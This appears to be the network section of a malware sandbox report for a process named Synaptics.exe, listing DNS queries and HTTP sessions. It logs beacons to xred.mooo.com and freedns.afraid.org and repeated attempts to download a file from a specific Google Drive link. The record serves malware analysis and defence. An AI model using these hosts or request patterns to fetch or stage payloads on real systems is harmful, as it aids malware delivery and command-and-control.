Jan 7, 2025 13:18:27.670217991 CET | 55541 | 53 | 192.168.2.11 | 1.1.1.1
Jan 7, 2025 13:18:27.676908016 CET | 53 | 55541 | 1.1.1.1 | 192.168.2.11
Jan 7, 2025 13:18:28.531847000 CET | 52541 | 53 | 192.168.2.11 | 1.1.1.1
Jan 7, 2025 13:18:28.539412022 CET | 53 | 52541 | 1.1.1.1 | 192.168.2.11
Jan 7, 2025 13:18:28.542031050 CET | 64025 | 53 | 192.168.2.11 | 1.1.1.1
Jan 7, 2025 13:18:28.687283993 CET | 53 | 64025 | 1.1.1.1 | 192.168.2.11
Jan 7, 2025 13:18:28.744261980 CET | 62784 | 53 | 192.168.2.11 | 1.1.1.1
Jan 7, 2025 13:18:28.751075029 CET | 53 | 62784 | 1.1.1.1 | 192.168.2.11
Jan 7, 2025 13:18:32.960489988 CET | 60871 | 53 | 192.168.2.11 | 1.1.1.1
Jan 7, 2025 13:18:32.969486952 CET | 53 | 60871 | 1.1.1.1 | 192.168.2.11
Jan 7, 2025 13:18:38.932378054 CET | 56046 | 53 | 192.168.2.11 | 1.1.1.1
Jan 7, 2025 13:18:38.941159010 CET | 53 | 56046 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 7, 2025 13:18:27.670217991 CET | 192.168.2.11 | 1.1.1.1 | 0x8d | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:28.531847000 CET | 192.168.2.11 | 1.1.1.1 | 0x94a6 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:28.542031050 CET | 192.168.2.11 | 1.1.1.1 | 0xe81c | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:28.744261980 CET | 192.168.2.11 | 1.1.1.1 | 0x2461 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:32.960489988 CET | 192.168.2.11 | 1.1.1.1 | 0x8428 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:38.932378054 CET | 192.168.2.11 | 1.1.1.1 | 0x4a51 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 7, 2025 13:18:20.515013933 CET | 1.1.1.1 | 192.168.2.11 | 0x70c9 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:18:20.515013933 CET | 1.1.1.1 | 192.168.2.11 | 0x70c9 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:27.676908016 CET | 1.1.1.1 | 192.168.2.11 | 0x8d | No error (0) | docs.google.com | | 142.250.185.110 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:28.539412022 CET | 1.1.1.1 | 192.168.2.11 | 0x94a6 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:28.687283993 CET | 1.1.1.1 | 192.168.2.11 | 0xe81c | No error (0) | freedns.afraid.org | | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:28.751075029 CET | 1.1.1.1 | 192.168.2.11 | 0x2461 | No error (0) | drive.usercontent.google.com | | 142.250.186.161 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:32.969486952 CET | 1.1.1.1 | 192.168.2.11 | 0x8428 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:38.941159010 CET | 1.1.1.1 | 192.168.2.11 | 0x4a51 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:30.852786064 CET | 1.1.1.1 | 192.168.2.11 | 0xdf70 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 13:19:30.852786064 CET | 1.1.1.1 | 192.168.2.11 | 0xdf70 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
                                                                                                                    • docs.google.com
                                                                                                                    • drive.usercontent.google.com
                                                                                                                    • freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49753 | 69.42.215.252 | 80 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
Jan 7, 2025 13:18:28.693512917 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                    User-Agent: MyApp
                                                                                                                    Host: freedns.afraid.org
                                                                                                                    Cache-Control: no-cache
Jan 7, 2025 13:18:29.317869902 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:29 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    X-Cache: MISS
                                                                                                                    Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49744 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:28 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2025-01-07 12:18:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:28 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-1DZ1eTYPl7j2DUiRdcMW4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49745 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:28 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2025-01-07 12:18:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:28 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Vt1MWP_oupsikF3vheqfVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49754 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2025-01-07 12:18:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:29 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CvrImC751Xf38-8ICjW-fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 49755 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:29 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
2025-01-07 12:18:29 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4Abtg2ITdHLlXhLkFQzK74zzYUN73qoq7aMNRJ8howqASwprWyEbv_N4ONIZofelFs
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:29 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-4jtpZ9yD2N_-NK5Jmf0TPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=i1tMKc6yLjj--7fan0rbLuRCWLfoAgwT3UT9WfUdnlJhpTvE_QyvzKFQpziQUyRFjIPk3RQf0aV54pT7PcIsKeGo8DNIeXtzNpkR3_xuIuxZ4zbg2pSE3qBkLS7ye7gITU8qVAEvbdLRrA4Aa9dGuCsdu7cX7sY-f4c_h-DCw4m1pFS549dDf4B5; expires=Wed, 09-Jul-2025 12:18:29 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2025-01-07 12:18:29 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ii3ipW0ZDNMR425ze015HA">*{margin:0;padding:0}html,code{font:15px/22px arial
2025-01-07 12:18:29 UTC | 57 | IN | Data Ascii: d on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.11 | 49757 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2025-01-07 12:18:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:29 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3mpD86N0T-Obd1TebyJmbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.11 | 49756 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:29 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
2025-01-07 12:18:30 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7R0MHyI5-6VfOQ8N3LdPxjeM0PTUTztLgxZ1AtA9uGXHGr4M7h4x_ty95ZKhuG4vax
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:29 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-eQiJQVd2AWJm0bvM7bOWVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8; expires=Wed, 09-Jul-2025 12:18:29 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2025-01-07 12:18:30 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gabtfsLkFNxVQdZzsxKpWA">*{margin:0;padding:0}html,code{font:15px/22px arial
2025-01-07 12:18:30 UTC | 57 | IN | Data Ascii: d on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.11 | 49768 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:30 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2025-01-07 12:18:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:30 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-yF-7yZG5PXiAgJTX0rBEnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.11 | 49769 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:30 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2025-01-07 12:18:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:30 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-2W32sZ41cTG61cvRIFJ8QA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.11 | 49771 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 12:18:30 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
2025-01-07 12:18:31 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5GgQF2kF1bSGzLdPsMNxWyfTc0pkL-XydrrNDxFxvD68OmlCsdo-Fc0vAdUY2LyXns
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:31 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-TDErWUJAIv-7IC3AOr6Uww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78; expires=Wed, 09-Jul-2025 12:18:31 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2025-01-07 12:18:31 UTC | 1594 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uoxn5O5Al3vRizO7Wm9MaQ">*{margin:0;padding:0}html,code{font:15px/22px arial
2025-01-07 12:18:31 UTC | 58 | IN | Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.11 | 49772 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
